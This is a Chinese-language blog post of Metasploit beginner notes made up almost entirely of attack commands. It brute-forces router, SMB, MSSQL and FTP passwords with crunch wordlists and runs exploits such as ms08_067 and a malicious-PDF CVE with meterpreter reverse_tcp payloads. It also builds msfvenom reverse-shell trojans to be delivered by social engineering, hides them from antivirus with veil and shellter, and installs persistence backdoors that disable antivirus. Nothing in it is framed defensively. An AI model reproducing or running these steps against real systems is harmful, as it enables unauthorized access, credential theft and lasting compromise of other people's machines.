MSF入门笔记

玩转Kali 2.0

Metasploit破解路由器密码

步骤:寻找渗透目标;制作密码字典;进行密码破解;进入路由器。

  1. ie输入192.168.1.1
    可以看到输入用户名密码的弹出窗口
  2. crunch
    crunch 3 4 1234567890 -o user.lst #生成3-4位的0-9的密码。
    crunch 8 8 -l 19@@0728 -o user.lst #生成8位的包含19**0728的密码
  3. 启动Metasploit
    msfconsole
    use auxiliary/scanner/http/http_login
    show options
    set rhosts 192.168.1.1
    set rport 80
    set username admin
    set pass_file /root/ps.lst
    设置完毕以后show options,查看参数设置是否成功,没有问题后执行:
    exploit
    然后开始暴力破解。
    4.破解成功

Metasploit破解指定服务器密码

步骤:寻找渗透目标;制作密码字典;进行密码破解;成功拿到服务器权限。

  1. windows 2003系统作为目标
    启动msf
    检查当前局域网环境下存活的主机
    msf > use auxiliary/scanner/discovery/arp_sweep
    set rhosts 192.168.1.100/24
    set threads 50
    exploit
    能找到存活主机
    msf > use auxiliary/scanner/smb/smb_version
    set rhosts 192.168.1.100
    set threads 50
    exploit
    操作系统版本收集,信息收集阶段完成
  2. 制作字典
    crunch
  3. 破解
    msf > use auxiliary/scanner/smb/smb_login
    set rhosts 192.168.43.158
    set threads 50
    set pass_file /root/pass.txt
    exploit
  4. 拿到服务器权限
    打开远程桌面,用刚才破解到的密码登陆

Metasploit破解mssql密码

步骤:收集目标;制作字典;进行密码破解。

  1. 收集目标
    搭建了一个windows 2003,安装了mssql 2000数据库。
    用以上教程,扫描当前存活主机,收集操作系统版本。
    msf > use auxiliary/scanner/discovery/arp_sweep
    网络扫描,选取一个作为目标
    msf > use auxiliary/scanner/portscan/syn
    端口探测,检测到打开了1433端口
    msf > use auxiliary/scanner/smb/smb_version
    扫描主机名称,操作系统,版本
  2. 制作字典
    crunch
  3. 进行密码破解
    msf > use auxiliary/scanner/mssql/mssql_login
    show options
    set rhosts
    set rport
    set username sa
    set pass_file /root/ps.lst
    set theards 50

Metasploit破解ftp密码

步骤:寻找目标;制作字典;进行破解。

  1. 收集目标
    参考以上内容
  2. 制作字典
  3. 参考以上内容
  4. 进行破解
    use auxiliary/scanner/ftp/ftp_version #检测版本
    use auxiliary/scanner/ftp/anonymous #测试是否支持匿名登陆
    use auxiliary/scanner/ftp/ftp_login #破解
    set rhosts 192.168.1.100
    set rport 21
    set username admin
    set pass_file /root/ps.lst
    exploit

Metasploit系列简单教程

ms08_067示例

msf>use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
可以使用info命令查看漏洞的信息
run开始攻击

浏览器漏洞ms10_018

msf>use exploit/windows/browser/ms10_018_ie_behaviors
set payload windows/meterpreter/reverse_tcp
show targets

快捷方式漏洞ms10_046

PDF漏洞利用

CVE-2010-2883

use exploit/windows/fileformat/adobe_cooltype_sing
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
生成pdf文件让客户端打开。
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp

爆破模块

生成木马

当不存在漏洞的时候可以通过社会工程学,把生成的木马发送给对方。
msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率。利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。
msfvenom也可以多次编码,也可以捆绑其他软件。
upx可以对程序进行再次加壳,压缩。
veil 免杀生成木马
配合msf连接被控制端。

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=2222 -f exe > /root/test.exe
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=2222 -f jar > /root/text.jar
生成test.exe和java.jar木马
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
#msf exploit(multi/handler) > set payload java/meterpreter/reverse_tcp
这里payload不一样
msf exploit(multi/handler) > show options
msf exploit(multi/handler) > run

免杀

veil
veil-evesion 基于msf负载模块生成exe,也需要msf 侦听。
shellter 捆绑工具
免杀有2种办法,可以用捆绑,可以用多次编码。
捆绑,shellter,可以将上面生成的木马捆绑到正常的exe当中。

维持访问

在meterpreter下面执行run persistence 可以设置后门在系统启动、用户登录时执行。
维持访问。即使删除掉源文件也可以。
run persistence -h 查看帮助。
设置完毕以后需要重启。
run scheduleme
持续性后门
run kill av 关闭杀毒软件
run

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

骆驼1024

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值